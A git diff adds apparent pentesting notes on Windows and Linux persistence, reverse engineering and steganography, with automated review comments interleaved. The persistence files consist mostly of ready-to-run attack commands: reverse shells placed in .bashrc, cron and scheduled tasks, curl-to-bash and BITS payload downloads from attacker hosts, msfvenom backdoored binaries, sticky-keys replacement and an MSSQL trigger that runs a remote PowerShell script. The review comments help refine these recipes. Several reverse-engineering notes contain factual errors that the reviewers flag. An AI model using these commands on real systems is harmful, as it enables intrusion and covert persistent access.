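Review bot: in the Wordlists.md hunk, `crunch -o` is missing crunch's mandatory `<min-len> <max-len>` arguments and an output file name, which the later `crunch 8 8 -t passw%%rd` example does show; give the first block the same shape or state that the lengths must be filled in. Minor: "Wordlistdownload" should be "Wordlist download", the `-a` bullet should name the command (`cupp.py -a`) like its siblings, and `# exrex` is a level-1 heading where the other tools use `##`.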
+++ b/Persistence/bashrc.md @@ -0,0 +1,8 @@ +# Bashrc Bogus + +## Add Reverse Shell +```sh +echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc +``` + + diff --git a/Persistence/crontab.md b/Persistence/crontab.md new file mode 100644 index 0000000..50df63c --- /dev/null +++ b/Persistence/crontab.md @@ -0,0 +1,15 @@ +# Cronjobs + +* `crontab -l` +* `cat /etc/crontab` + +## Add Cronjob +* Add line +```sh +* * * * * root curl http://:8000/shell.sh | bash +``` + * Shell content + ```sh + bash -c "bash -i >& /dev/tcp// 0&1" + ``` + diff --git a/Persistence/meterpreter.md b/Persistence/meterpreter.md new file mode 100644 index 0000000..e13b02c --- /dev/null +++ b/Persistence/meterpreter.md @@ -0,0 +1,6 @@ +# Meterpreter Persistence + +## Load shell on system startup +```sh +run persistence -X +``` diff --git a/Persistence/persistence.md b/Persistence/persistence.md new file mode 100644 index 0000000..065d02a --- /dev/null +++ b/Persistence/persistence.md 
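Review bot: in the bashrc.md hunk, the `/dev/tcp//` target has lost its host and port; write them as explicit placeholders (for example `<ATTACKER_IP>/<PORT>`, matching the `$ATTACKER_IP`/`$ATTACKER_PORT` convention used in persistence.md) so the line is not copied as-is. A short note that the entry fires on every interactive shell start, which is what a defender baselining `~/.bashrc` looks for, would make the page more useful.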
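Review bot: in the crontab.md hunk, the `* * * * * root curl http://:8000/shell.sh | bash` line uses the system-crontab format (six fields with a user column), which belongs in `/etc/crontab` or `/etc/cron.d/`, not in a per-user `crontab -e` entry; say which file the line is meant for. The URL has an empty host and, as in bashrc.md, the `/dev/tcp//` target is missing its placeholders. The nested code fence under "Shell content" is indented inside the list item, which renders differently across markdown engines.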
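Review bot: in the meterpreter.md hunk, `run persistence -X` refers to the legacy meterpreter `persistence` script, which Metasploit has deprecated in favour of the local persistence modules; document the module path (`exploit/windows/local/persistence`) or at least note the deprecation so the one-liner does not go stale.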
@@ -0,0 +1,323 @@ +# Persistence + +* Gain through + * Startup folder persistence + * Editing registry keys + * Scheduled tasks + * SUID + * BITS + * Creating a backdoored service + * Creat user + * RDP + +## Gain Persistence on Windows +* Browser. Add to trusted sites. +* Powershell +```sh +Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe +``` +* DOSprompt +```cmd +certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe" +``` +### Background Intelligence Transfer Service (BITS) +```sh +bitsadmin /create __shell__ +bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe" +``` +```sh +bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe" +bitsadmin /SetMinRetryDelay 30 +bitsadmin /resume +``` + +## Elevate Privileges +* Create user `net user /add ` +* Add to admin group via `net localgroup administrators /add` +* Check `net localgroup Administrator` + +### More stealthy + +* Backup Operator group is more stealthy, no admin by r/w on files +```sh +net localgroup "Backup Operators" /add +net localgroup "Remote Management Users" /add +``` +* The following two groups are assigned through membership of `Backup Operators` + * SeBackupPrivilege, read files + * SeRestorePrivilege, write files + +* Any local group is stripped of off its admin permissions when logging in via RDP. 
Therefore disable the following regkey via +```sh +reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 +``` +* Afterwards, check if `Backup Operators` is enabled via `whoami /groups` +* Backup `SAM` and `SYSTEM` via +```sh +reg save hklm\system system.bak +reg save hklm\sam sam.bak +download system.bak +download sam.bak +secretsdump.py -sam sam.bak -system system.bak LOCAL +``` +* Pass-the-hash via evil-winrm + +### secedit + +* Get r/w on files through editing a config file +* Export secedit and open it +```sh +secedit /export /cfg config.inf +``` +* Add user to the groups +```sh +SeBackupPrivilege = [...], +SeRestorePrivilege = [...], +``` +* Convert the file +```sh +secedit /import /cfg config.inf /db config.sdb +secedit /configure /db config.sdb /cfg config.infk +``` +* Add the user to the RDP group via net localgroup like before or do +```sh +Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI +``` +* Add & Click user -> Full Control(All Operations) +* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before + +### Relative ID (RID) + +* UID like in linux + * Administrator has `RID = 500` + * Other interactive users `RID >= 1000` +* Get RIDs +```sh + wmic useraccount get name,sid +``` +* Assign `500` to regular user +```sh + PsExec64.exe -i -s regedit +``` +* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>` +* Search for RID value as hexadecimal value +* Open the key called `F` and change effective RID at position `0x30` +* Insert LE hex of `0d500`, which is `f401` + +## Add to registry + +* Execute on user logon via +```sh +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f +``` + +## Add a Service + +### Meterpreter + +* Inside meterpreter `load powershell` and `powershell_shell` +```sh +New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot" +``` + +### 
Powershell + +* Start a service automatically +```sh +sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto +sc.exe start SteamUpdater +``` + +* Use a service PE instead +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe +``` + +* Modify an existing service + * Enumerate all the services +```sh +sc.exe query state=all +``` + * Info about a specific service, start type should be automatic, service start name should be target user +```sh +sc.exe qc +``` + * Reconfigure +```sh +sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem" +sc.exe start FoundService +``` + +## Add Scheduled Task + +```sh +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe +$B = New-ScheduledTaskTrigger -AtLogOn +$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest +$D = New-ScheduledTaskSettingsSet +$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D +Register-ScheduledTask ReverseShell -InputObject $E +``` + +* Alternatively via `schtasks` +```sh +schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM +``` + * Check task +```sh +schtasks /query /tn SteamUpdater +``` + +* Deleting Security Descriptor of a task to make it invisible. 
Delete the following key +```sh +HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\\SD +``` + +## File Backdoor + +### Mimic PE +```sh +msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe +``` + +### Reference Script +* Recycle shortcut of an app to reference a reverse shell script + * Right click -> `Properties` -> `Target` +* Reference the the script `certainlynobackdoor.ps1` via +```sh +powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1 +``` +* Content of the script `certainlynobackdoor.ps1` +```sh +Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" +C:\Windows\System32\calc.exe +``` + +### File Association + +* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\` +* Choose a class and `/shell/open/command` contains the file to be opened as the first argument `%1` +* Chang the argument to a shell script and pass the arg through it +```sh +Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" +C:\Windows\system32\NOTEPAD.EXE $args[0] +``` +* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1` + + +## Persistence via Logon + +### Startup directories +* Users' Startup directory under +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup +``` + +* Startup directory for all users, put the reverse shell here +```sh +C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp +``` + +### Registry Keys + +* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` +* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` +* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` + +* Create `Expandable String Value` under any of this keys with the value of the reverse shell path + + +* 
`HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done + * Either `shell` or `Userinit` can be appended with a comma separated command + +### Logon Scripts + +* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts + +* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload + + +## RDP or Login Screen + +### Sticky Keys +* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed +* Take ownership of the binary via +```sh +takeown /f c:\Windows\System32\sethc.exe +icacls C:\Windows\System32\sethc.exe /grant Administrator:F +``` +* Overwrite with `cmd.exe` +```sh +copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe +``` + +### Utilman + +* Ease of access button is clickable at the login screen, it is executed with system privileges +* Take ownership and overwrite with `cmd.exe` +```sh +takeown /f c:\Windows\System32\utilman.exe +icacls C:\Windows\System32\utilman.exe /grant Administrator:F +copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe +``` + +## Web Shell + +* Default user is `iis apppool\defaultapppool` +* Has `SeImpersonatePrivilege` + +* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx) +* Move shell to `C:\inetpub\wwwroot` on target +* Get the shell via `http://$TARGET_IP/shell.aspx` + +## MSSQL + +* Triggers bind actions such as INSERTs + +* Open Microsoft SQL Server Management Studio + * Choose windows auth + * `New Query` + * Enable Advance Options via +```sh +sp_configure 'Show Advanced Options',1; +RECONFIGURE; +GO + +sp_configure 'xp_cmdshell',1; +RECONFIGURE; +GO +``` + * Grant privileges to all users +```sh +USE master +GRANT IMPERSONATE ON LOGIN::sa to [Public]; +``` + + * Change to DB +```sh +USE +``` + + * Create trigger +```sh +CREATE TRIGGER [sql_backdoor] +ON HRDB.dbo.Employees +FOR INSERT AS + +EXECUTE AS LOGIN = 
'sa' +EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"'; +``` + +* Trigger the trigger by visiting the site which triggers the trigger through a db call + diff --git a/Persistence/wmi.md b/Persistence/wmi.md new file mode 100644 index 0000000..6d09ef1 --- /dev/null +++ b/Persistence/wmi.md @@ -0,0 +1,3 @@ +# WMI Backdoor + +* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git) diff --git a/Reverse Engineering/Android.md b/Reverse Engineering/Android.md new file mode 100644 index 0000000..1fbc8ff --- /dev/null +++ b/Reverse Engineering/Android.md 
@@ -0,0 +1,81 @@ +# Misc + +* `Dalvik` is the JVM of Android + +## SMALI + +* `SMALI` is the byte code derived from Java. +* Types +``` +V void +Z boolean +B byte +S short +C char +F float +I int +J long +D double +[ array +``` + +### Registers +* Registers are 32 bits +* Type long and double use two registers 32+32=64 bits +* `.registers`, total number of regs in method +* `.locals`, non parameter regs in method +* Arguments of a method are put into registers from highest to lowest. +* The object itself is a parameter to its method. + +* Register naming schemes are +* Normal local register are name v0, v1, v2 ... +* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers. + + +## APK Structure + +* `AndroidManifest.xml`, binary XML +* `classes.dex`, app code compilation as dex +* `resource.arsc`, precompiled resources in XML +* `res`, resource dir +* `assets` app assets +* `lib`, libraries +* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk. + +## Tools + +* `jadx -d ` as a decompiler +* dex2jar to convert apk to jar +```sh +d2j-dex2jar.sh /path/application.apk +``` +* Dex to smali with `d2j-dex2smali` +* jd-gui as decompiler +* `apktool` smali source from apk + +* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git) +* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git) +* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git) +* Proguard deobfuscates code +* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git) +* Burpsuite listener on Android emulator +* [Drozer](https://github.com/FSecureLABS/drozer) +```sh +adb forward tcp:31415 tcp:31415 +drozer console connect +run app.package.list -> see all the packages installed +run app.package.info -a -> view package information. 
+run app.package.attacksurface package_name +run app.activity.info -f package_name +run app.activity.start --component package name component_name +``` +```sh +run app.provider.info -a package_name +run scanner.provider.finduris -a package_name +run app.provider.query uri +run app.provider.update uri --selection conditions selection_arg column data +run scanner.provider.sqltables -a package_name +run scanner.provider.injection -a package_name +run scanner.provider.traversal -a package_name +``` + diff --git a/Reverse Engineering/Deobfuscation.md b/Reverse Engineering/Deobfuscation.md new file mode 100644 index 0000000..e5ee271 --- /dev/null +++ b/Reverse Engineering/Deobfuscation.md 
@@ -0,0 +1,97 @@ +# Deobfuscation + +## Principles of Obfuscation + +* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf) + +* These layers and what's obfuscated are: + * __Code Element__ + * Layout + * Controls + * Data + * Classes + * Methods + * __Software Component__ + * __Inter Component__ + * Library calls + * Used Resources + * __Application__ + * DRM System + * Neural Networks + +## Evade Statical Rules + +* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation + * __Array Transformation__ + * __Data Encoding__ + * __Data Procedurization__ + * __Data Splitting & Merging__ + +### Splitting & Merging of Strings + +* Breaking signature by modifying data distribution inside the code +* This may be done by modifying strings and functions through following measures + +* __Joining__ +```python +"CAFFEE" + "BABE" +``` + +* __Reordering__ +```python +a = "BABE" +b = "CAFFEE" +f"{b}{a}" +``` + +* __Whitespaces of functions which are not interpreted__ +```c +int main ( void ) { + printf ( "The answer is %d", 42 ) ; +} +``` + +* __Adding ticks which are not interpreted__ + +* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__ + +### Adding Unnecessary Instructions + +* Obfuscation of layout and controls inside the code +* __Junk Stubs__ +* __Separation of Related Code__ +* __Stripping Redundant Symbols__ +* __Meaningless Identifiers__ +* __Converting Explicit to Implicit Instructions__ +* __Dispatcher Based Controls Executed During Runtime__ +* __Probabilistic Control Flows__ +* __Bogus Control Flows__ + + +### Control Flow + +* Changing or adding to the flow of the code through change of conditions +* Changes may be set to arbitrary code segments by __Opaque Predicates__ +* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the 
reverse engineer + +### Protecting Data + +* Stripping and protecting + * __Code Structure__ + * __Object names__ + * __File & Compilation Properties__ + +* To strip symbols +```sh +strip --strip-all +``` + +* Check via +```sh +nm +``` + +## Usage + +* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator +* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__ diff --git a/Reverse Engineering/Dynamic Linked Libraries.md b/Reverse Engineering/Dynamic Linked Libraries.md new file mode 100644 index 0000000..8899c40 --- /dev/null +++ b/Reverse Engineering/Dynamic Linked Libraries.md @@ -0,0 +1,9 @@ +# DLL Reversing + +* Start DLL on its own with the help a wrapper +```C# +HMODULE dll = LoadLibraryA("DLL.DLL"); +typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y) +Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName"); +Add(1, 2); +``` diff --git a/Reverse Engineering/Firmware.md b/Reverse Engineering/Firmware.md new file mode 100644 index 0000000..faaee1d --- /dev/null +++ b/Reverse Engineering/Firmware.md 
@@ -0,0 +1,35 @@ +# Reversing Firmware + +## Tools +* binwalk +* unlzma +* tar +* [fat](https://github.com/attify/firmware-analysis-toolkit.git) + * Create usable environment and start firmware inside it + ```sh + ./fat.py + ``` +* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git` + +## Usage +* Check image via `strings` +* Check CRC via `cksum -a crc ` +* Use `binwalk` to extract. There are to methods + * `-e` extract by offset + * `--dd=".*"` by file extension + +### Mount JFFS2 File +* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10` +```sh +rm -rf /dev/mtdblock0 +mknod /dev/mtdblock0 b 31 0 +mkdir /mnt/jffs2 +modprobe jffs2 +modprobe mtdram +modprobe mtdblock +dd if= of=/dev/mtdblock0 +mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/ +``` + +## Tips & Tricks +* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php) diff --git a/Reverse Engineering/Function Mangling.md b/Reverse Engineering/Function Mangling.md new file mode 100644 index 0000000..d44db63 --- /dev/null +++ b/Reverse Engineering/Function Mangling.md @@ -0,0 +1,4 @@ +# Function Decoration + +* Done to imported functions in order to do interpositioning and identify the variants of the function. +* [name mangling](https://en.wikipedia.org/wiki/Name_mangling) diff --git a/Reverse Engineering/Krakatau.md b/Reverse Engineering/Krakatau.md new file mode 100644 index 0000000..c998327 --- /dev/null +++ b/Reverse Engineering/Krakatau.md @@ -0,0 +1,17 @@ +# Krakatau + +## Usage +* Get bytecode from `jar` file +```sh +krakatau-disassemble -r file.jar -out dissassemble.zip +``` +* Generate bytecode +```sh +krakatau-assemble -out result.jar -r dissassembled/ +``` +* Do changes to the bytecode +* Compile jar file +```sh +java -cp result.jar +``` + diff --git a/Reverse Engineering/Portable Executable.md b/Reverse Engineering/Portable Executable.md new file mode 100644 index 0000000..7f3d3a7 --- /dev/null 
+++ b/Reverse Engineering/Portable Executable.md @@ -0,0 +1,33 @@ +# Portable Executable + +* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) +* An executable binary in the windows world +The file format consists of + * PE Header + * Data Sections + +## Data Section + +The data section consists of +* __.text__, program code +* __.data__, initialized variables +* __.bss__, unanitialized variables +* __.edata__, exportable objects and related table info +* __.idata__, imported objects and related table info +* __.reloc__, image relocation info +* __.rsrc__, links external resources, e.g. icons, images, manifests + +## Starting a PE + +If a process starts, the PE is read in the following order +1. Header sections + * File signatue is __MZ__, and magic number are read + * Architecture of the platform + * timestamp +2. Section table details is parsed +3. Content is mapped into memory based on + * Entry point address and offset of ImageBase + * Relative Virtual Address (RVA), addresses related to Imagebase +4. Libraries and imports are loaded +5. Entrypoint address of the main function is run + diff --git a/Reverse Engineering/References.md b/Reverse Engineering/References.md new file mode 100644 index 0000000..4af98d5 --- /dev/null +++ b/Reverse Engineering/References.md @@ -0,0 +1,7 @@ +# Reverse Engineering References + + +## Debugger + +[scdbg](https://github.com/dzzie/SCDBG.git) + diff --git a/Reverse Engineering/Scada.md b/Reverse Engineering/Scada.md new file mode 100644 index 0000000..b36c598 --- /dev/null +++ b/Reverse Engineering/Scada.md 
@@ -0,0 +1,35 @@ +# Supervisory Control and Data Acquisition (SCADA) + +* SCADA works as an aggregatio of the following systems + * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices. + * __Remote Terminal Unit (RTU)__, use for wide area telemetry + * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input. + * __Communication network__ + +* Security is no first class citizen + +## Modbus + +* Developed by Modicon +* Master/Slave, latter has an 8 bit address. +* RS-485 Connector +* Data registers 16 bit + * Input register, 16 bit ro + * Hold register, rw + * Coil register, 1 bit rw + * Discrete register, 1bit ro + +### Function Codes +* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html) +* RTU request inside of TCP segments, port 502 + +* 1 __Read Coil__ +* 2 __Read Discrete Input__ +* 3 __Read Holding Registers__ +* 4 __Read Input Registers__ +* 5 __Write Single Coil__ +* 6 __Write Single Holding Register__ +* 15 __Write Multiple Coils__ +* 16 __Write Multiple Holding Registers__ + + diff --git a/Steganography/OutGuess.md b/Steganography/OutGuess.md new file mode 100644 index 0000000..c056ec3 --- /dev/null +++ b/Steganography/OutGuess.md @@ -0,0 +1,2 @@ +# Outguess +`man outguess` diff --git a/Steganography/References.md b/Steganography/References.md new file mode 100644 index 0000000..6f60417 --- /dev/null +++ b/Steganography/References.md @@ -0,0 +1,10 @@ +# Steganography Tools + +[Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git) +[OutGuess](https://github.com/resurrecting-open-source-projects/outguess) +[Remnux Docs](https://docs.remnux.org/) +[Steghide](http://steghide.sourceforge.net/) +[Stegbrute](https://github.com/R4yGM/stegbrute) +[stegoVeritas](https://github.com/bannsec/stegoVeritas) +[zsteg](https://github.com/zed-0xff/zsteg) + diff --git a/Steganography/Remnux.md b/Steganography/Remnux.md new file mode 100644 index 0000000..454db33 
--- /dev/null +++ b/Steganography/Remnux.md @@ -0,0 +1,24 @@ +# ReMnux +* [Documentation](https://docs.remnux.org/) + +## Tools + +### Peepdf +* Extracting JS from PDF using config file into `js_from_pdf.js` +```sh +echo 'extract js > js_from_pdf.js' > extract_js.conf +peepdf -s extract_js.conf +``` + +### vmonkey +* Detects malicious VBasic code in documents. +```sh +vmonkey +``` + +### Packaged Binaries +* Can be identified via entropy or loaded libs + * The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`. + * [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers. + * File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high. + diff --git a/Steganography/Stegbrute.md b/Steganography/Stegbrute.md new file mode 100644 index 0000000..08c119e --- /dev/null +++ b/Steganography/Stegbrute.md @@ -0,0 +1,9 @@ +# Stegbrute +Bruteforce stego jpegs with a password. + +* install via `cargo install stegbrute` + +## Usage +```sh +stegbrute -f -w +``` diff --git a/Steganography/Steghide.md b/Steganography/Steghide.md new file mode 100644 index 0000000..91ba361 --- /dev/null +++ b/Steganography/Steghide.md @@ -0,0 +1,8 @@ +# Steghide + +* JPGs only + +* Example +```sh +steghide extract -sf jpeg1.jpeg +``` diff --git a/Steganography/StegoScripts/xor_key_file.py b/Steganography/StegoScripts/xor_key_file.py new file mode 100644 index 0000000..c79d223 --- /dev/null +++ b/Steganography/StegoScripts/xor_key_file.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +def xor(data, key): + keylen = len(key) + return bytearray(( + (data[i] ^ key[i % keylen]) for i in range(0,len(data)) + )) + + +if __name__ == "__main__": + data = bytearray(open('topsecret.txt', 'rb').read()) + key = b'key' + res = xor(data, key) + print(res.decode()) + diff --git a/Steganography/Stegoveritas.md b/Steganography/Stegoveritas.md new file mode 100644 index 0000000..eb09a3f --- /dev/null 
+++ b/Steganography/Stegoveritas.md @@ -0,0 +1,3 @@ +# Stegoveritas + +* Install via `pip install stegoveritas` and `stegoveritas_install_deps` diff --git a/Steganography/Zsteg.md b/Steganography/Zsteg.md new file mode 100644 index 0000000..7a071b9 --- /dev/null +++ b/Steganography/Zsteg.md @@ -0,0 +1,8 @@ +# zsteg + +* PNGs, BMPs + +* Example +```sh +zsteg png1.png --strings all +```
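Review bot: in the persistence file's MSSQL section, `GRANT IMPERSONATE ON LOGIN::sa to [Public];` (bullet "Grant privileges to all users") lets every login on the instance impersonate `sa`, far more than the trigger needs; the trigger's `EXECUTE AS LOGIN = 'sa'` only requires that the login owning the trigger context can impersonate `sa`, so grant it to that one login instead of `[Public]`. The three fenced blocks in that section are tagged `sh` but contain T-SQL (`sp_configure`, `GRANT`, `CREATE TRIGGER`); tag them `sql`. `USE ` has lost its database name, and the same angle-bracket placeholder loss shows up elsewhere in the patch (`jadx -d `, `vmonkey `, `dd if= `, `./fat.py `). The closing bullet "Trigger the trigger by visiting the site which triggers the trigger through a db call" would read better as "Fire the trigger by causing an INSERT into `HRDB.dbo.Employees`, e.g. through the web front end." In the Sticky Keys and Utilman steps, `takeown` on a TrustedInstaller-owned system binary needs an elevated prompt, and `/grant Administrator:F` targets the account literally named `Administrator`; say so.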
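Review bot: in Reverse Engineering/Android.md, "Proguard deobfuscates code" is backwards: ProGuard shrinks and obfuscates; recovering names from its output needs the build's `mapping.txt` (ProGuard's retrace). "`Dalvik` is the JVM of Android" is also off: Dalvik is a register-based VM executing dex bytecode, not Java class files, and has been replaced by ART since Android 5.0. "`SMALI` is the byte code derived from Java" should say smali is the human-readable assembler syntax for dex bytecode. File names: `resource.arsc` should be `resources.arsc` and `META/INF` should be `META-INF`. The register bullet "Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers" only holds for a method with `.registers 4` and two parameters; state the assumption.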
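Review bot: in Reverse Engineering/Deobfuscation.md, the heading "Evade Statical Rules" should read "Evade Static Rules" (the section is about defeating static signatures), and "obfuscater" should be "obfuscator". The "Whitespaces" snippet is C while the neighbouring snippets are Python; that is fine, but the sentence above it, "This may be done by modifying strings and functions through following measures", should make clear the examples span languages. `strip --strip-all` and `nm` have lost their file operand, and the "Check via `nm`" step would be clearer as "`nm` prints no symbols on a stripped binary; compare with `nm` before stripping".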
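Review bot: in Reverse Engineering/Dynamic Linked Libraries.md, the fence is tagged `C#` but the body is C/C++ Win32 code (`LoadLibraryA`, `GetProcAddress`, a function-pointer `typedef`); tag it `c` or `cpp` and add `#include <windows.h>`. Both `LoadLibraryA` and `GetProcAddress` return `NULL` on failure and the snippet calls through the result unchecked; check `dll` and `Add` before `Add(1, 2)`. The `WINAPI` (`__stdcall`) in the typedef must match the export's actual calling convention, otherwise the call corrupts the stack on 32-bit builds; on x64 it is irrelevant, which is worth a comment.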
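Review bot: in Reverse Engineering/Firmware.md, the JFFS2 mount recipe loads `mtdram` with its defaults, which is a 4 MiB device (`total_size` in KiB, plus `erase_size`), so `dd if= of=/dev/mtdblock0` silently truncates any larger image; load it sized to the image, e.g. `modprobe mtdram total_size=65536 erase_size=128`. `rm -rf /dev/mtdblock0` should be `rm -f`, it is a device node. The module is gated by `CONFIG_MTD_MTDRAM`, not `CONFIG_MTD_RAM`, and the "any kernel before `5.10`" claim is unsourced; drop it or cite it. Typo: "There are to methods" should be "two".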
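Review bot: in Reverse Engineering/Function Mangling.md, name mangling is not something "done to imported functions in order to do interpositioning": the compiler mangles every C++ symbol it defines or references (encoding namespace, class and parameter types so that overloads get distinct linker names), and the Windows "decoration" of C functions (`_name@N` for stdcall) serves the same purpose for calling conventions; interpositioning is a use of the resulting names, not their reason.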
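Review bot: in Reverse Engineering/Krakatau.md, the steps are in the wrong order and the last one is mislabelled: "Do changes to the bytecode" must come between disassembling and `krakatau-assemble`, and "Compile jar file" followed by `java -cp result.jar` actually runs the assembled jar (and needs a main class after the classpath), assembly already happened in the previous step. Suggested order: disassemble, edit the `.j` files, assemble, run. Spelling: "dissassemble".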
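Review bot: in Reverse Engineering/Portable Executable.md, "File signatue is __MZ__, and magic number are read" conflates two headers: `MZ` is the DOS header magic at offset 0, and the PE signature `PE\0\0` at the offset given by `e_lfanew` is what identifies the file as PE. "Entrypoint address of the main function is run" is inaccurate: `AddressOfEntryPoint` points at the runtime startup stub (e.g. `mainCRTStartup`), which later calls `main`/`WinMain`. `.rsrc` embeds the resources rather than "links external resources". Typos: "unanitialized", "signatue".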
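Review bot: in Reverse Engineering/Scada.md, "RTU request inside of TCP segments, port 502" is not Modbus TCP: Modbus TCP prefixes the PDU with a 7-byte MBAP header (transaction id, protocol id, length, unit id) and drops the RTU CRC; a raw RTU frame carried in TCP is "Modbus RTU over TCP", a different encapsulation. "RS-485 Connector" should say RS-485 (or RS-232) is the serial electrical standard, not a connector. "Security is no first class citizen" can be made concrete: Modbus has no authentication or encryption, so any host that reaches port 502 can issue the write function codes 5, 6, 15 and 16 listed below. Typo: "aggregatio".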
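Review bot: in Steganography/Remnux.md, "Detects malicious VBasic code" undersells `vmonkey`: ViperMonkey emulates VBA macros and reports the actions and IOCs observed during emulation. `peepdf -s extract_js.conf` is missing the PDF operand. "Packaged Binaries" should be "Packed Binaries" throughout; the substance (tiny import table limited to `LoadLibrary`/`GetProcAddress`, high entropy) is right, but add that PEiD is signature-based and misses custom packers.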
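Review bot: in Steganography/Steghide.md, "JPGs only" is wrong: steghide accepts JPEG, BMP, WAV and AU cover files. The example `steghide extract -sf jpeg1.jpeg` will prompt for a passphrase; add `-p ''` to try the empty passphrase non-interactively, which is the usual first attempt before reaching for stegbrute.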
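Review bot: in Steganography/StegoScripts/xor_key_file.py, `print(res.decode())` raises `UnicodeDecodeError` whenever the XOR output is not valid UTF-8, which is exactly what happens with a wrong key; use `sys.stdout.buffer.write(res)` or `res.decode(errors='replace')`. The shebang `#!/usr/bin/env python` should be `python3`: under Python 2 `key = b'key'` is a `str`, so `key[i % keylen]` yields a one-character string and `data[i] ^ key[...]` raises `TypeError`. The hard-coded `topsecret.txt` and `b'key'` would be better taken from `sys.argv`.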